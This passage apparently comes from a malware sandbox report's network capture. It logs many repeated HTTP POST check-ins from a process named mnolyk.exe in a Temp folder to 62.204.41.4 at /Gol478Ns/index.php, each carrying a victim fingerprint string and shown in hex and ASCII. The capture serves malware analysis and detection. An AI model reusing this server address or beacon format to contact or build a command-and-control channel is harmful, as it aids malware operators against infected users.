                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.446054935 CET | 728 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        529 | 192.168.2.5 | 50219 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:11.621916056 CET | 729 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.687207937 CET | 729 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        53 | 192.168.2.5 | 49743 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:53.921247005 CET | 254 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.985326052 CET | 254 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        530 | 192.168.2.5 | 50220 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:11.858797073 CET | 730 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.924299955 CET | 730 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        531 | 192.168.2.5 | 50221 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:12.104837894 CET | 731 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.170964956 CET | 731 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        532 | 192.168.2.5 | 50222 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:12.337101936 CET | 732 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.400702000 CET | 732 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        533 | 192.168.2.5 | 50223 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:12.572504044 CET | 733 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.636516094 CET | 733 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        534 | 192.168.2.5 | 50224 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:12.834481955 CET | 734 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:12.900197983 CET | 734 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        535 | 192.168.2.5 | 50225 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:13.073060989 CET | 735 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.140642881 CET | 735 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        536 | 192.168.2.5 | 50226 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:13.307960033 CET | 736 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.373641014 CET | 736 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        537 | 192.168.2.5 | 50227 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:13.545015097 CET | 737 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.608417034 CET | 737 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        538 | 192.168.2.5 | 50228 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:13.781549931 CET | 738 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.847825050 CET | 738 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        539 | 192.168.2.5 | 50229 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:14.024749994 CET | 739 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.089824915 CET | 739 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        54 | 192.168.2.5 | 49744 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:57.374562025 CET | 255 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:57.440777063 CET | 255 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        540 | 192.168.2.5 | 50230 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:14.260159016 CET | 740 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.326316118 CET | 740 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        541 | 192.168.2.5 | 50231 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:14.506548882 CET | 741 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.571222067 CET | 741 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        542 | 192.168.2.5 | 50232 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:14.756016016 CET | 742 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.823223114 CET | 742 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        543 | 192.168.2.5 | 50233 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:15.000211954 CET | 743 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.083638906 CET | 743 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        544 | 192.168.2.5 | 50234 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:15.265930891 CET | 744 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.331311941 CET | 744 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        545 | 192.168.2.5 | 50235 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:15.519092083 CET | 745 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.585570097 CET | 745 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        546 | 192.168.2.5 | 50236 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:15.762067080 CET | 746 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.827687025 CET | 746 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        547 | 192.168.2.5 | 50237 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:16.017119884 CET | 747 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.085264921 CET | 747 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        548 | 192.168.2.5 | 50238 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:16.271311998 CET | 748 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.337477922 CET | 748 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        549 | 192.168.2.5 | 50239 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:16.511065006 CET | 749 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.574798107 CET | 749 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        55 | 192.168.2.5 | 49745 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:57.611372948 CET | 256 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:57.675415993 CET | 256 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        550 | 192.168.2.5 | 50240 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:16.745452881 CET | 750 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.811587095 CET | 750 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        551 | 192.168.2.5 | 50241 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:16.998707056 CET | 751 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.066359997 CET | 751 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        552 | 192.168.2.5 | 50242 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
